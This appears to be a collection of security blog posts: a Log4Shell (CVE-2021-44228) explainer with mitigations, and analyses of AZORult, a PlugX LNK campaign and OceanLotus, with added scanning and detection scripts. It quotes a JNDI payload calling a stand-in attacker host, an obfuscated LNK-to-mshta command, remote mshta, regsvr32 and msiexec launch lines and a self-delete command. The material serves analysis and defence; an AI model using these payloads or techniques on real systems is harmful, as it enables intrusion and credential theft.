Log4j2 is an open-source, Java-based library commonly integrated into Apache web servers to provide logging. According to reports, Alibaba researcher Chen Zhaojun sent a report of a Log4j2 remote code execution (RCE) vulnerability to Apache on 24 November 2021. This critical vulnerability was later assigned the identifier CVE-2021-44228, also known as "Log4Shell", and affects all Log4j2 versions from 2.0-beta9 to 2.14.1.

Analysis

CVE-2021-44228 allows an external, unauthenticated attacker to exploit a server running a vulnerable Log4j version by sending a request that contains exploit code (a payload). The request is delivered via JNDI through a number of services, including:

  • Lightweight Directory Access Protocol (LDAP)
  • Remote Method Invocation (RMI)
  • Domain Name System (DNS)

Once the payload triggers the Log4j vulnerability, the server issues a JNDI request through one of the services controlled by the attacker. On receiving that request, the attacker returns a path to a remotely hosted Java class file, which the server then loads into its processing flow, allowing the attacker to execute arbitrary code.

How the exploit works

Log4j2 added lookup functionality, including JNDI lookups, but this JNDI lookup was not restricted, which led to the security vulnerability.

The Java Naming and Directory Interface (JNDI) is a Java API that allows many kinds of data and resources (objects, files, directories, and so on) to be stored and accessed. JNDI is designed to provide a common interface for accessing existing services such as DNS, LDAP, CORBA and RMI.

Among these, one data type can return a URI pointing to a Java class, and if the system downloads and processes an untrusted Java class, the server is endangered if that class contains malicious code.

First, the attacker sends the target server a string containing the payload, on the condition that the payload gets logged by the system (in this case, the attacker constructs a JNDI lookup and inserts it into an HTTP header):

User-Agent: ${jndi:ldap://attacker.com:port/path}

When the target server parses the payload string above, the Log4j instance initiates an LDAP request through JNDI to the URL endpoint controlled by the attacker. The LDAP server, also controlled by the attacker, responds with information pointing to a remote Java .class file endpoint created by the attacker, which contains the executable code:

dn:
javaClassName: <class name>
javaCodeBase: http://second-stage.attacker.com/exploit.class
objectClass: javaNamingReference
javaFactory: <file base>

Finally, during processing on the target server, the Java class is loaded into memory and executed by Log4j, which also executes the malicious code embedded in that Java class.

Source: fastly.com


A simulation of the attack is set up here: https://github.com/christophetd/log4shell-vulnerable-app

Severity

Because of how widespread the Log4j2 library is, a great many systems have been and are being affected by CVE-2021-44228 Log4Shell, including the systems and cloud services of Steam, Cloudflare, Twitter, Tesla and others, and numerous public exploits have been posted on GitHub. The vulnerability is currently being very actively exploited by hackers.

Public CVE-2021-44228 exploit code on GitHub
Exploiting CVE-2021-44228 in Minecraft

Remediation

Patching the vulnerability

A patch for the CVE-2021-44228 Log4j RCE is now available; updating as soon as possible is recommended to avoid being affected: Log4j's latest release, v2.15.0.

On earlier releases (>=2.10), the vulnerability can be mitigated by:

  • setting "log4j2.formatMsgNoLookups" to "true", or:
  • removing the JndiLookup class from the classpath

(For example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)

In addition, on Java 8u121 the RCE can be countered by setting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false".

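To verify the mitigations above on a deployment (which Log4j version is actually shipped, and whether JndiLookup.class really was removed from the jar), here is an added Python scanner that is not part of the original post or of Log4j itself. It assumes the Log4j version is carried in the jar manifest's Implementation-Version (falling back to the file name), recurses into nested jars and WARs, and builds its own constructed sample archives for the demonstration.

```python
"""Scan JAR/WAR archives for the Log4Shell conditions described above: a log4j-core
in the affected range 2.0-beta9 .. 2.14.1, or a JndiLookup.class still on the
classpath. Nested archives (fat jars, WEB-INF/lib) are inspected recursively."""
import io
import re
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple; a pre-release tag sorts
    below the final release (2.0-beta9 < 2.0). Returns None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(\w+))?", text.strip())
    if not m:
        return None
    major, minor, patch, tag = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if tag else 1, tag or "")


FIRST_AFFECTED = parse_version("2.0-beta9")
FIRST_FIXED = parse_version("2.15.0")


def is_affected(version_text):
    v = parse_version(version_text)
    return v is not None and FIRST_AFFECTED <= v < FIRST_FIXED


def manifest_version(zf):
    """Implementation-Version from the manifest (assumed to hold the Log4j version)."""
    if MANIFEST not in zf.namelist():
        return None
    for line in zf.read(MANIFEST).decode("utf-8", "replace").splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def scan_archive(data, name, findings=None):
    """Recursively scan archive bytes; returns a list of (where, what) findings."""
    findings = [] if findings is None else findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip at all (e.g. a jar-named file that is really a script)
    names = zf.namelist()
    if JNDI_LOOKUP in names:
        findings.append((name, "JndiLookup.class present"))
    base = name.rsplit("/", 1)[-1].rsplit("!", 1)[-1]
    if base.startswith("log4j-core"):
        version = manifest_version(zf)
        if version is None:  # fall back to the version embedded in the file name
            m = re.match(r"log4j-core-(.+)\.jar$", base)
            version = m.group(1) if m else None
        if version is not None and is_affected(version):
            findings.append((name, "affected log4j-core version " + version))
    for entry in names:  # descend into bundled archives
        if entry.lower().endswith((".jar", ".war", ".ear", ".zip")):
            scan_archive(zf.read(entry), name + "!" + entry, findings)
    return findings


def scan_file(path):
    with open(path, "rb") as fh:
        return scan_archive(fh.read(), path)


def build_sample_jar(version, include_jndi_lookup):
    """Construct a minimal stand-in for log4j-core (sample data, not a real Log4j build)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(MANIFEST, "Manifest-Version: 1.0\nImplementation-Version: %s\n" % version)
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_sample_war(core_jar):
    """Bundle the stand-in jar under WEB-INF/lib, where deployments usually carry it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core_jar)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_war(build_sample_jar("2.14.1", True))
    for where, what in scan_archive(sample, "app.war"):
        print(where, "->", what)
```

Both findings matter: removing JndiLookup.class silences the class check, but the version finding remains until the jar is upgraded.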
Using a WAF

Set up WAF-based monitoring to protect the application: detect requests that contain the Log4j exploit string, which can be inserted anywhere in an HTTP request, and block those requests so the application never processes the exploit string.

HTTP Request      Action
Log4j Headers     BLOCK
Log4j Body        BLOCK
Log4j URL         BLOCK

Or enable the WAF offered by cloud providers such as Google Cloud, Cloudflare or Amazon AWS.

One last thing to note: Log4j v1 is no longer supported and can still be affected by the CVE-2021-44228 Log4j RCE, so upgrade to Log4j's latest release, v2.15.0, as soon as possible.


See also & sources:

Digging deeper into Log4Shell – 0Day RCE exploit found in Log4j | Fastly

Inside the log4j2 vulnerability (CVE-2021-44228) (cloudflare.com)

Actual CVE-2021-44228 payloads captured in the wild (cloudflare.com)

By DatMom

Taking advantage of the Covid-19 epidemic, hackers have exploited people's need for information around the world to spread malware. The attacker tricks the user into downloading and running malware whose visible interface is fetched from a legitimate source while the malicious part runs in the background.

The malware was identified as AZORult, a malware family discovered in 2016 that collects web browser data such as cookies, browsing history, user IDs, passwords and even encryption keys.

In-depth analysis

Sample Corona-virus-Map.com.exe

Hash: 73da2c02c6f8bfd4662dc84820dcd983

File Type: Portable Executable 32

File Info: Microsoft Visual C++ 8, AutoIt

The attacker tricks the user into downloading a file named "Corona-virus-Map.com.exe". This file is written in AutoIt, so we can easily decompile it and obtain the source code of the malware.

The script shows that it creates a folder at "%APPDATA%\Z11062600", installs two files, "Corona.exe" and "Corona-virus-Map.com.exe", and then launches both files.

Sample Corona-virus-Map.com.exe

Hash: 07b819b4d602635365e361b96749ac3e

File Type: Portable Executable 32

File Info: Microsoft Visual Studio .NET

The file "Corona-virus-Map.com.exe" dropped onto the user's computer is a .NET file, analysed after decompression and decompilation. Its main function is to retrieve data from "hxxps://gisanddata[.]maps.arcgis[.]com/apps/opsdashboard/index[.]html#/bda7594740fd40299423467b48e9ecf6" and display a map of Covid-19 infections to the user, so as to gain trust and keep the user from becoming suspicious.

Sample Corona.exe

Hash: 1beba1640f5573cbac5552ae02c38f33

File Type: Portable Executable 32

File Info: Rar archive

When launched, "Corona.exe" creates two files, Corona.bat and Corona.sfx.exe. The bat file has the following content:

@echo off
Corona.sfx.exe -p3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r -dC:\Windows\System32

The "Corona.exe" process uses cmd to run "Corona.bat", which in turn launches "Corona.sfx.exe". This "Corona.sfx.exe" creates and runs another Corona.exe with the same function as the first one, which creates and launches the next two files, bin.exe and Build.exe, in the folder "%APPDATA%\Z58538177". To make this easier to picture, the process graph is as follows:

Sample bin.exe

Hash: c4852ee6589252c601bc2922a35dd7da

File Type: Portable Executable 32

File Info: Borland Delphi

This is the main executable of the malware, identified by security vendors as AZORult, a data-stealing malware family. Once on the computer, the malware collects the victim's identifying information such as GUID, version information, username and computer name, and creates a separate GUID:

From the GUID just created, the malware creates a mutex to prevent two instances of the malware from running at the same time.

The malware re-encodes the identity information and immediately decrypts the C&C address.

The malware connects to the C&C server, sends the identity information of the victim machine, and the server returns a large amount of data.

After the malware decodes the downloaded data, we can see that it downloads a list of dynamic libraries to the victim machine and writes them to the folder "%TEMPda".

The malware holds a lengthy list of links from which we can determine what it targets. It steals data from browsers such as Firefox, Chrome, Chromium, Brave, Edge, Comodo, Kometa, Cốc Cốc, Opera, 360, ..., from email clients such as Outlook, Thunderbird, ..., and many more. The libraries are downloaded to provide the functions the attacker needs to read that data.

For example, the malware queries Outlook profile data in the registry:

Or steals the password used to access the FileZilla server:

Even the victim's cryptocurrency is touched:

Finally, the malware encrypts the captured data, sends it back to the C&C server, and then runs a command to delete its files:

C:\Windows\system32\timeout.exe 3 & del "bin.exe"

Sample Build.exe

Hash: F6A5E02F46D761D3890DEBD8F2084D37

File Type: Portable Executable 32

File Info: UPX v3.0, AutoIt

There are many tools that can unpack UPX, such as CFF Explorer. When executed, this file copies itself to "%APPDATA%\amd64_netfx4-system.runti..dowsruntime.ui.xaml.Globalization.Fontgroups.exe" and runs. Just as with the first dropper, we only need to decompile the AutoIt file to obtain its source code.

We save a lot of time because this sample is not heavily obfuscated. Through analysis and information gathering, we can conclude that the sample's main activity is to steal information from browser cookies, steal encryption keys, disable the proxy configuration and change file properties for anonymity.

IOC

Hash

  • MD5: 73da2c02c6f8bfd4662dc84820dcd983
  • MD5: 07b819b4d602635365e361b96749ac3e
  • MD5: 1beba1640f5573cbac5552ae02c38f33
  • MD5: c4852ee6589252c601bc2922a35dd7da
  • MD5: F6A5E02F46D761D3890DEBD8F2084D37
  • MD5: e9dcbecca02b600ce135f7d58b8cd830
  • MD5: 3cb9fc1ee05f49438455ba1aea3bca4e

Domain

  • coronavirusstatus [.] space

Cleaning steps

  • Find files with the above MD5s in the directories:
    • %APPDATA%\Z11062600
    • %APPDATA%\Z58538177
    • %APPDATA%\amd64_netfx4-system.runti..dowsruntime.ui.xaml
  • End all processes of the above files (if any)
  • Delete all of the above files (if present and if the hash matches)
  • Delete the scheduled task pointing to the file Windows.Globalization.Fontgroups.exe. Software from trusted antivirus vendors can also be used for the cleanup.

Conclusion

The severity of the Covid-19 epidemic is beyond dispute. Bad actors are taking full advantage of coronavirus-related information on the web, and many people may become prey to attacks. Users need to calmly protect themselves against both biological viruses and computer viruses. For a safe map of the epidemic situation, users should visit the Johns Hopkins University website https://coronavirus.jhu.edu/map.html
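As an added example (not from the original write-up), a Python script that performs the check behind the first three cleaning steps: it hashes every file under the listed %APPDATA% drop folders and reports any whose MD5 is on the IOC list above. The folder names come from the write-up; the truncated third folder is matched by prefix, and demo() builds a constructed sample tree instead of touching real malware.

```python
"""Hunt for the AZORult drop artifacts listed above: hash every file under the drop
folders and report the ones whose MD5 is on the IOC list."""
import hashlib
import os

# MD5 IOCs from the IOC section of this write-up
AZORULT_MD5 = {
    "73da2c02c6f8bfd4662dc84820dcd983",
    "07b819b4d602635365e361b96749ac3e",
    "1beba1640f5573cbac5552ae02c38f33",
    "c4852ee6589252c601bc2922a35dd7da",
    "f6a5e02f46d761d3890debd8f2084d37",
    "e9dcbecca02b600ce135f7d58b8cd830",
    "3cb9fc1ee05f49438455ba1aea3bca4e",
}


def md5_of(path, chunk=1 << 16):
    """Stream the file through MD5 so large droppers need not fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hunt(directories, iocs=AZORULT_MD5):
    """Return [(path, md5)] for files under the directories whose MD5 is an IOC.
    Missing directories are skipped and unreadable (e.g. locked) files are ignored,
    so one bad path does not abort the sweep."""
    wanted = {h.lower() for h in iocs}
    hits = []
    for top in directories:
        top = os.path.expandvars(top)
        if not os.path.isdir(top):
            continue
        for root, _dirs, files in os.walk(top):
            for name in files:
                path = os.path.join(root, name)
                try:
                    digest = md5_of(path)
                except OSError:
                    continue
                if digest in wanted:
                    hits.append((path, digest))
    return hits


def default_drop_dirs(appdata=None):
    """The drop folders from the cleaning steps, resolved under %APPDATA%. The third
    folder name is truncated in the write-up, so it is matched by prefix."""
    appdata = appdata or os.environ.get("APPDATA", "")
    dirs = [os.path.join(appdata, "Z11062600"), os.path.join(appdata, "Z58538177")]
    if os.path.isdir(appdata):
        for name in os.listdir(appdata):
            if name.startswith("amd64_netfx4-system.runti"):
                dirs.append(os.path.join(appdata, name))
    return dirs


def demo():
    """Run the hunt on a constructed tree (a placeholder file, not real malware);
    returns (hits, sample_path, sample_md5)."""
    import tempfile
    base = tempfile.mkdtemp()
    folder = os.path.join(base, "Z11062600")
    os.makedirs(folder)
    sample = os.path.join(folder, "bin.exe")
    with open(sample, "wb") as fh:
        fh.write(b"constructed placeholder, not the real dropper")
    digest = md5_of(sample)
    # the placeholder's own hash stands in for an IOC; upper case exercises the case folding
    return hunt(default_drop_dirs(base), {digest.upper()}), sample, digest


if __name__ == "__main__":
    for path, digest in hunt(default_drop_dirs()):
        print("IOC match:", path, digest)
```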

MustangPanda – COVID 19 Malware
07 Mar

I / Introduction

Recently, with the complicated development of COVID-19, many hacker groups have taken advantage of it to conduct APT campaigns aimed at organizations around the world, and such campaigns have appeared in Vietnam as well.

Taking advantage of the stressful COVID-19 situation, malware similar to that developed by the Panda hacker group was found impersonating three government notices about the outbreak in order to deceive users. The malware was embedded in a Word file titled "Chi Thi thuong nguyen xuan phuc" to deceive users; we collected this sample through the CMC Threat Intelligence system.

The Threat Intelligence system links this malicious sample to some recent samples that we have issued warnings about:

CMC WARNING NEW APT CAMPAIGN ADVANTAGES UNIKEY ATTACKING USERS IN VIETNAM

CMC CYBER SECURITY ANALYSIS OF LNK MALWARE FORM OF APT PANDA GROUP


II / Detail

FILE LNK

The sample is a shortcut file with the ".lnk" extension, disguised as a Word file to deceive users because Windows hides the ".lnk" extension. However, this fake Word file has a suspicious target. Normally a shortcut's target points to a folder or file, but the target of this sample contains a command of the form:

%comspec% /c for %x in (%temp%=%) do for /f "delims==" %i in ('dir "%x\Chi Thi thuong nguyen xuan phuc.lnk" /s /b') do start m%windir:~-1,1%hta.exe "%i"

The above command is obfuscated by using the variable %comspec% instead of calling the string "cmd.exe" directly, and the "s" in the file name mshta.exe is obtained by taking the last character of the variable "%windir%" (usually C:\Windows). Mshta.exe is a Microsoft application developed to allow rapid application building with HTML, CSS, VBScript and JavaScript. Using mshta and the .hta file format, an HTML page can be opened as an application. The .hta format is the same as HTML; by adding a tag inside the HTML file, we get an .hta file that can be opened through the mshta application.

However, data can be inserted in front of the .hta header. Taking advantage of this, the attacker prepended the .lnk file, whose command opens the file itself with mshta.exe, so that the embedded .hta content is executed. When the user opens the .lnk file, the command in its target runs and launches mshta.exe to open the file itself.

FILE HTA

By default, mshta.exe can execute both JavaScript and VBScript embedded in .hta files using the related DLLs. When opened, the embedded .hta file has the following properties: minimized, not shown on the taskbar, no menu and no caption. Its sole task is to execute the malicious VBScript code.

When the VBScript is executed, it decodes and stores into the %TEMP% folder three base64-encoded binary files and one document file.

The document file is then opened for the user.

The PlugX RAT is then executed by this attack:

The 3.exe file is actually a clean file, but when executed it loads a malicious DLL.

To achieve this, the attacker only needs to find a DLL that 3.exe loads through the LoadLibrary function (in this case http_dll.dll), create a malicious DLL with the same name as the LoadLibrary parameter, and place it in the same directory as 3.exe. When LoadLibrary is called, 3.exe finds the DLL in its own directory first and loads it.

When "http_dll.dll" is loaded, it redirects the execution of the PE file to a function in the DLL by changing the memory protection of the PE file's memory via the VirtualProtect API and replacing the code with a push/ret pair.

The malicious DLL's function reads the file http_dll.dat from the same directory. The beginning of this .dat file is a null-terminated string, followed by data. This string is used as the decryption key for the data portion of the .dat file.

After that, the malware allocates a new memory region to hold the result of the decryption, which is carried out with the XOR algorithm using the string key from the .dat file as above. The malware then changes the protection of this new region to PAGE_EXECUTE_READWRITE and executes the shellcode at that address.

The decoded content is a raw PE file, but it has been cleverly combined with a shellcode that starts at offset 0. This shellcode acts as a loader that loads the raw PE file so that it can execute properly.

First, the shellcode finds the address of kernel32.dll, then fetches the functions LoadLibrary, GetProcAddress, ZwFlushInstructionCache and VirtualAlloc by comparing hashes of the names of the functions exported by kernel32.

Then the loader reads the PE header, maps the sections to the corresponding memory areas, relocates some addresses and resolves the file's Import Address Table. Once complete, execution is passed to the DllMain function of this PE file.

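The .dat layout and XOR step described above, as an added Python example that is neither the malware's code nor the original post's: it splits the null-terminated key from the data, XORs the rest with the repeated key, and then locates the raw PE inside the decoded buffer the way the loader must (an MZ header whose e_lfanew points at the PE signature). The sample blob is constructed, not the real http_dll.dat.

```python
"""Decode an http_dll.dat-style blob as described above: a null-terminated key string at
offset 0, then data XOR-encrypted with that key repeated. The decoded buffer holds a raw PE
prefixed by loader shellcode, so the PE header is searched for inside it, not at offset 0."""


def split_key_and_data(blob):
    """Return (key, data); the key is the null-terminated string at the start of the file."""
    end = blob.find(b"\x00")
    if end <= 0:
        raise ValueError("no null-terminated key at the start of the file")
    return blob[:end], blob[end + 1:]


def xor_with_key(data, key):
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_dat(blob):
    key, data = split_key_and_data(blob)
    return key, xor_with_key(data, key)


def find_embedded_pe(buf):
    """Offset of the first 'MZ' whose e_lfanew (DWORD at +0x3C) points at the PE
    signature, which is what the loader needs before mapping sections; -1 if none."""
    pos = buf.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(buf):
            e_lfanew = int.from_bytes(buf[pos + 0x3C:pos + 0x40], "little")
            sig = pos + e_lfanew
            if buf[sig:sig + 4] == b"PE\x00\x00":
                return pos
        pos = buf.find(b"MZ", pos + 1)
    return -1


def build_sample_dat(key=b"k3y"):
    """Construct a sample (not the real http_dll.dat): a 4-byte NOP stub standing in for
    the shellcode, then a minimal DOS/PE header skeleton, encrypted under the key.
    Returns (blob, plaintext) so callers can check the round trip."""
    pe = b"MZ" + b"\x00" * (0x3C - 2) + (0x40).to_bytes(4, "little") + b"PE\x00\x00"
    plaintext = b"\x90" * 4 + pe
    return key + b"\x00" + xor_with_key(plaintext, key), plaintext


if __name__ == "__main__":
    blob, _ = build_sample_dat()
    key, decoded = decrypt_dat(blob)
    print("key:", key, "| embedded PE at offset", find_embedded_pe(decoded))
```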
Final Payload

Here, the malware selects a number of paths to use, then decrypts a data section for use.

The decoding result is a number of strings including the autorun key name and the C&C server IP. The malware then proceeds to:

  • Copy the three executable files to the user's profile directory, or to ALLUSERSPROFILE if it has sufficient administrator rights.
  • Add an autorun key to activate the dropped executable when the computer restarts, and relaunch itself if this is its first run. The malware distinguishes the two cases by passing an additional parameter on subsequent runs.
  • Create a mutex and connect to the server to receive commands.
  • Create a backdoor that allows an attacker to execute commands remotely.
  • Support many different commands, including uploading files and folders, listing folders, reading files, getting computer and user information, and so on.

III / Conclusion

The use of various attack and evasion techniques during execution shows that the people behind the malware invested a lot of time researching the target and developing the attack method accordingly. An APT is a malicious attack, carefully invested in to steal important information and cause damage to the organization. To prevent APT attacks, always prepare new precautions and maintain ongoing monitoring to ensure the security of users and organizations.

HASH

SHA256: BBBEB1A937274825B0434414FA2D9EC629BA846B1E3E33A59C613B54D375E4D2

MD5: 60C89B54029442C5E131F01FF08F84C9

SHA1: 52873A2C81B1F462CDDF3C86B2103F74EF56F91E

C:\Users\admin\AppData\Local\Temp\3.exe:

C3159D4F85CEB84C4A0F7EA9208928E729A30DDDA4FEAD7EC6257C7DD1984763

C:\Users\admin\AppData\Local\Temp\http_dll.dll:

79375C0C05243354F8BA2735BCD086DC8B53AF709D87DA02F9206685095BB035

C2

DOMAIN vietnam.zing.photos

IP 104.160.44.85

By ManhChich - UraSec Team - CMC SOC Center

Attack situation in China of the OceanLotus group, identified as originating from Vietnam
18 Dec

In the first half of 2019, according to Tencent's cybersecurity intelligence center, the OceanLotus group was publicly disclosed. The targets of this organization are diverse, including government agencies, maritime authorities, diplomatic agencies, large state-owned enterprises, scientific research organizations and a number of large Chinese private enterprises.

Through tracking, Tencent discovered that a large number of domestic targets were attacked by this group, with the target's entire intranet occupied and a large amount of confidential information and server configuration stolen. The attackers appear to be very familiar with China, understanding China's hot topics and government structure. For example, when a tax reform had just been launched, the tax reform plan was immediately used as the subject of an attack.

Sea Lotus (OceanLotus), also known as APT32, is a cyber attack organization identified by many organizations as coming from Vietnam. Since its inception, the group has carried out attacks on China, as well as on many other countries around the world.

The attack methods have not changed much since the first detection, but there are some small improvements, including attack decoys, payloads and bypassing of security layers, which are still in use. After gaining control of a machine, the attacker scans the entire network. This also shows that APT attacks will not stop until they reach their goal. As long as the target remains valuable, the attack keeps intensifying.

Characteristics of the attack

Attack by phishing email

Sea Lotus sends fake emails in the name of reputable organizations, so users are easily fooled into downloading malicious files themselves. Throughout 2019, many phishing emails were sent, such as the following:

The accounts used to send phishing emails are usually NetEase mailboxes. The hijacked accounts are typically of the form: Sun**@126[.]com, Yang**@163[.]com, insert**@126[.]com ...

Diversified decoys
The group diversified the bait used for the attack, and almost every kind of bait was used. In addition to malicious .lnk and .doc files, WinRAR ACE compressed files (CVE-2018-20250) are mentioned in many reports.

Malicious file as doc:

Decoded .chm file:

Winrar flaw (CVE-2018-20250)

Various ways to download files
Due to the variety of phishing decoys, the method of downloading malicious files also varies.

Direct execution

The executable file is disguised as a DOCX file with the Microsoft Word icon to trick users into downloading it. After the user downloads and opens the DOC file, the content in the document appears garbled, enticing the victim to enable the macro code in the document so that the content can be viewed. In fact, after macros are enabled, the normal content is still not displayed.

Use Rundll32 to load the malicious DLL
After the malicious code executes, it calls and runs the actual malicious code {1888B763-A56C-4D4B-895C-2092993ECCBA} in the C:\Users\Administrator\AppData\Local\Microsoft folder, then uses Rundll32 to execute the DLL:

"C:\Windows\system32\rundll32.exe" "C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll", Register
Macro
Using a macro to execute, with obfuscated macro code:

Office memory executes malicious shellcode
The macro code decodes the shellcode directly in Office and creates a thread to execute it in memory:

Use the DLL
Using the DLL side-loading technique to execute and download malicious files:


Registration

Register a malicious DLL as a system component to execute:

Embed command file
When the .chm file executes, it prompts to run ActiveX code:

Script content of the file:

However, due to encoding issues, the .chm is truncated after opening:


After decompression, the original content is as follows:

Persistence via scheduled tasks
After the .chm executes, the bcdsrv.dll file is dropped under %AppData%\Roaming and a scheduled task named WeeklyMaintenance is created:

Execution command:

C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll

bcdsrv.dll is the actual malicious file.

.lnk calling mshta

Detailed analysis of the .lnk technique calling mshta

Once executed, the following command is called:

C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html

And news.html is actually a VBS file containing executable code.

Use odbcconf.exe to download the file
odbcconf.exe is a file shipped with the system. It can be used to execute a DLL file, and because the parent process is a system file, it may evade some security software:

WinRAR ACE vulnerability (CVE-2018-20250)
A compressed package exploiting this vulnerability can be structured as follows: in addition to extracting normal files on decompression, a self-extracting file is written to the startup folder (C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup):

This file is a self-extracting program. On startup, it drops the file {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx, then issues the command:

regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx

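A detection pass over the execution techniques listed above, as an added Python example (not from the original report): rules for the mshta, msiexec -Y, rundll32 and regsvr32 patterns shown in this section, run against constructed JSON process-creation records that reuse the command lines quoted above plus benign look-alikes. The record format is an assumption; map the fields of your own EDR or Sysmon export onto it.

```python
"""Flag the living-off-the-land execution patterns described above in process-creation
records. Each record is a JSON object with Image and CommandLine fields (a constructed
format; map your Sysmon/EDR export onto it)."""
import json
import re

GUID = r"\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}"

# (rule name, regex on the image path, regex on the command line); all case-insensitive
RULES = [
    ("mshta fetching a remote HTA", r"\\mshta\.exe$", r"https?://"),
    ("msiexec -Y loading a DLL", r"\\msiexec\.exe$", r"\s[-/]y\s+\S+\.dll"),
    ("rundll32 GUID-named DLL under AppData\\Local\\Microsoft", r"\\rundll32\.exe$",
     r"appdata\\local\\microsoft\\" + GUID + r"\.dll"),
    ("regsvr32 /i GUID-named OCX", r"\\regsvr32\.exe$", r"/i\s+" + GUID + r"\.ocx"),
]


def match_rules(image, command_line):
    """Names of all rules matching one record."""
    return [name for name, image_re, cmd_re in RULES
            if re.search(image_re, image, re.I) and re.search(cmd_re, command_line, re.I)]


def scan_log(lines):
    """Return [(line_number, rule_name)] over JSON-lines input; blank or malformed
    records are skipped so one bad line does not stop the sweep."""
    findings = []
    for number, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        for name in match_rules(record.get("Image", ""), record.get("CommandLine", "")):
            findings.append((number, name))
    return findings


# Constructed records: lines 2-5 reuse the command lines shown in this section,
# lines 6-7 are benign look-alikes that must not fire.
SAMPLE_LOG = r'''
{"Image": "C:\\Windows\\SysWOW64\\mshta.exe", "CommandLine": "C:\\Windows\\SysWOW64\\mshta.exe http://api.baidu-json.com/feed/news.html"}
{"Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "C:\\Windows\\System32\\msiexec.exe -Y C:\\Users\\Administrator\\AppData\\Roaming\\bcdsrv.dll"}
{"Image": "C:\\Windows\\system32\\rundll32.exe", "CommandLine": "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Users\\ADMINI~1\\AppData\\Local\\Microsoft\\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll\", Register"}
{"Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx"}
{"Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "msiexec.exe /i C:\\Temp\\vendor-setup.msi /qn"}
{"Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"}
'''


def scan_sample():
    return scan_log(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for number, name in scan_sample():
        print("line %d: %s" % (number, name))
```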
Multi-load attack
In its latest attack, Sea Lotus used a multi-load attack. In previous attacks, after decoding the shellcode, the RAT was executed directly, for example:

We found that now, after decoding the shellcode, a further shellcode is downloaded and executed first. If the download fails, the pre-installed RAT is loaded:

This makes the attack activity richer, more diverse and also more controllable.

Evading security software
Sea Lotus also uses a variety of methods to evade security software, mainly:

Use a DLL to execute
Use system executables
See odbcconf.exe above, for example.

Execute shellcode directly in Office
Add junk data to the file to inflate its size.
To prevent files from being collected by security vendors, Sea Lotus intentionally adds a large amount of junk data to the resources of certain files to inflate the file size.

When a file is padded with junk data, its size reaches 61.4 MB (64,480,256 bytes):

Create a backdoor
The backdoor file is encrypted and customized according to the computer's properties. Therefore the file hash differs on each machine, and the file cannot be analysed without information about the machine that holds the backdoor. Even if the malware is found by security vendors, as long as there is no data about the infected computer, the payload cannot be decoded.

Disguising the C&C connection
According to the configuration, various connections and disguises can be made, and the C2 is assembled and resolved. C&Cs are usually structured as follows (xxx is the configured C2):

{rand}.xxx

www6.xxx

cdn.xxx

api.xxx

Fake HTTP headers:

Custom backdoor
One of the most impressive techniques used by Sea Lotus in 2019 (mostly in the phase-2 backdoor) was recently published: the malicious file dropped on each victim machine is encrypted using properties of that computer (such as the hostname) and then executed. Without that information, it cannot be decoded.

Therefore each dropped malicious file is different, and even if it is found by a security vendor, the actual payload cannot be decoded without the victim's related data.

The backdoor is also executed through file and process pairs including AdobeUpdate.exe + goopdate.dll, KuGouUpdate.exe + goopdate.dll, XGFileCheck.exe + goopdate.dll, SogouCloud.exe + inetmib1.dll and other combinations.

The encoding process is:

The example below shows that the username was used for the encryption.

The victim's username is Cao**. It can be seen that the Trojan was created specifically to infect this computer.

Malware
Through monitoring, it was noticed that Sea Lotus often uses three main types of malware: CobaltStrike's Beacon Trojan, a modified Denis Trojan and the Ghost family. CobaltStrike's Beacon and the Denis family are found most often; Ghost is rarely used.

CobaltStrike:

Denis:

Modified Ghost:

Hacking the network
After a server has been infected with malware via phishing email, Sea Lotus continues its attacks on internal machines. They scan, search and attack internal machines in as many ways as possible.

Get the hash:

Package file:

Scheduled tasks are also created to continuously download tools through PowerShell:

The malicious file was detected as goopdate.dll.

Some other activities

During tracking, several attacks similar to Sea Lotus attacks were found, such as:

The malicious code was eventually executed via two payload types:

